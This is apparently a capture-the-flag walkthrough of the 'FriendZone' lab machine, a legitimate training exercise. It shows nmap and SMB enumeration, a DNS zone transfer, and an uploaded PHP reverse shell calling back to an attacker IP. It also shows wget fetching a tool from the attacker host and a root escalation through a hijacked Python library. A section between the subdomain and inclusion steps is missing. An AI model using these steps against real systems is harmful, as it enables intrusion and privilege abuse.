As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
-sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
--min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.
-p- scanning the entire port range, from 1 to 65535.
-T5insane mode, it is the fastest mode of the nmap time template.
-Pn assume the host is online.
-n scan without reverse DNS resolution.
-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Sep 5 13:43:56 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.044s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
# Nmap done at Mon Sep 5 13:44:09 2022 -- 1 IP address (1 host up) scanned in 13.60 seconds
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
-sC performs the scan using the default set of scripts.
-sV enables version detection.
-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Sep 5 13:45:45 2022 as: nmap -sCV -p21,22,53,80,139,443,445 -oN targeted 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-05T11:46:00
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-09-05T14:46:00+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 5 13:46:09 2022 -- 1 IP address (1 host up) scanned in 24.41 seconds
Let's start enumerating the SMB server with smbmap.
smbmap -H 10.10.10.123
-H IP address of host.
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
The guest user is able to read the general share and write and read in the Development share. Note the comment on the Files share saying that it is located in /etc/files. We could guess that the other two shares are located in /etc/general and /etc/Development. The Development share is empty.
smbclient //10.10.10.123/Development
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 5 18:16:54 2022
.. D 0 Wed Jan 23 22:51:02 2019
9221460 blocks of size 1024. 6459548 blocks available
But the general share contains one file called creds.txt.
smbclient //10.10.10.123/general
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6459548 blocks available
Let's transfer it to our local machine, and open it.
smb: > get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
The file contains some credentials, but we don't know for what yet. If we take a look at the HTTP website on port 80, we'll see just an image and an email with the friendzoneportal.red domain.
Let's add that domain name and the one which nmap reported to the /etc/hosts file.
Now, let's check if there is any virtual hosting going on.
Virtual hosting is a method for hosting multiple domain names (with separate handling of each name) on a single server.
If we check the following URL, we'll see another different website.
https://friendzone.red/
And in using the friendzoneportal.red domain name, we'll see another one.
https://friendzoneportal.red/
As port 53 (DNS) is open on the machine, we can try to do a transfer zone attack and list all possible subdomains for the friendzone.red domain name.
dig @10.10.10.123 friendzone.red axfr
; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:32:37 CEST 2022
;; XFR size: 8 records (messages 1, bytes 289)
And the friendzoneportal.red domain name.
dig @10.10.10.123 friendzoneportal.red axfr
; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:34:23 CEST 2022
;; XFR size: 9 records (messages 1, bytes 309)
Let's add all these new subdomains to the /etc/hosts file.
This happens probably because the PHP script is adding the .php extension to the value of the pagename parameter. One thing we could do is upload a PHP file, which will send us a reverse shell, to the Development share, supposedly located in /etc/Development, and access it through this exploit. I will be using the /usr/share/webshells/php/php-reverse-shell.php reverse shell.
$ip = '10.10.14.11'; // CHANGE THIS
$port = 4444; // CHANGE THIS
Then upload the shell to the Development share.
smbclient //10.10.10.123/Development
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (44.3 kb/s) (average 44.3 kb/s)
Set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.
-vverbose mode.
-nnumeric-only IP, no DNS resolution.
-p specify the port to listen on.
Finally, if we put /etc/Development/php-reverse-shell.php, we should get a shell as the www-data user. Then, we'll be able to grab the user flag.
There is only one user called friend. If we inspect the /var/www directory, we'll find the mysql_data.conf file which contains the password for the friend user.
cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
Let's become the friend user.
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/$ whoami
friend
friend@FriendZone:/$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.
cd /tmp
wget http://10.10.14.11:8000/pspy64
chmod +x pspy64
If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /opt/server_admin/reporter.py script.
Now we can modify the script so when root executes it, it will give the /bin/bash binary the SUID permission. Add the following code at the end of the /usr/lib/python2.7/os.py script.
nano /usr/lib/python2.7/os.py
system("chmod u+s /bin/bash")
If we wait for a few minutes, we should see the bash binary with SUID permissions.
